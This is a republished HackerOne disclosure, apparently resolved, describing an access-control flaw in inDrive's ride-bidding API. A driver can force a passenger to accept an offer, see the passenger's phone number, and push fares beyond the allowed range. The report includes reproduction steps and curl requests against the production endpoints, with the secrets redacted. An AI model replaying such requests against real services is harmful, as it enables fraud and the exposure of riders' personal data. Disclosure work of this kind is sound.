Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

Rider can forcefully get passenger's order accepted resulting in multiple impacts including PII reveal and more mentioned in the report.

High
I
inDrive
Submitted None

Team Summary

Official summary from inDrive

A vulnerability was found in a customer order flow that allowed a driver to accept an order on behalf of a passenger. This vulnerability allowed the driver to set the ride price by force bypassing the built-in ride price calculation algorithm, where the passenger and the driver negotiate the fare based on their preferences.

Actions:
View on HackerOne
Reported by spongebhav

Vulnerability Details

Technical details and impact analysis

Improper Access Control - Generic
## Summary: Hello Indrive Security Team, This is going to be chain of attacks with major flow being in /api/setTenderStatus request allowing the attacker to get their ride request accepted automatically. ## Steps To Reproduce: 1st major vulnerability: // Forcefully getting the passenger to accept the ride ### Section 1 1. Whenever a rider/driver offers the passenger their price there is a request that is sent to /api/driverrequest █████ 2. Now after getting the tenderID and OrderID from that request, the rider sends the request in /api/setTenderStatus in this format █████████ Here the orderID and tenderID is from step 1. 3. The ride gets accepted. The impact for this is "The rider can get details of any passenger, this includes phone number of passengers. Even when the passenger doesn't accept the riders offer." Please keep in mind that this can be automated in real time to make this attack more efficien. 2nd Chain vulnerability: // Chose a out of range price ### Section 2 1. This request is sent when the rider bids his price: ██████████ 2. The rider can modify the price range to be of a much higher value than that. 3. Resulting in sending a bid that is significantly more // Combining this with above vulnerability we can get passenger to forcefully accept the ride of the customer. ==Provide the request in curl format, if possible== For vuln A: ``` curl https://terra-akamai.indriverapp.com/api/setTenderStatus?cid=5957&locale=en_US&phone=████&token=████████&v=7&stream_id=1682280490209367&tender_id=████████&order_id=█████████&status=accept ``` For vuln B: ``` curl https://terra-akamai.indriverapp.com/api/driverrequest?cid=5957&locale=en_US&job_id=338f72ff-f3c1-4da0-af15-5d1aa720146b&phone=██████████&token=████████&v=7&stream_id=1682279074257167&order_id=██████&client_id=█████████&shield_session_id=██████████&type=indriver&price=63&period=3&geo_arrival_time=1&distance=5&longitude=85.3249627&latitude=27.7390611&sn=1 ``` Thank you so much. Let me know if you need any further help in reproducing this issue. @spongebhav ## Impact 1. Revealing PII of customers even if customer didn't accept the rider's request. 2. Making customer accept a bid that is significantly higher tricking the customer into giving more money.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Improper Access Control - Generic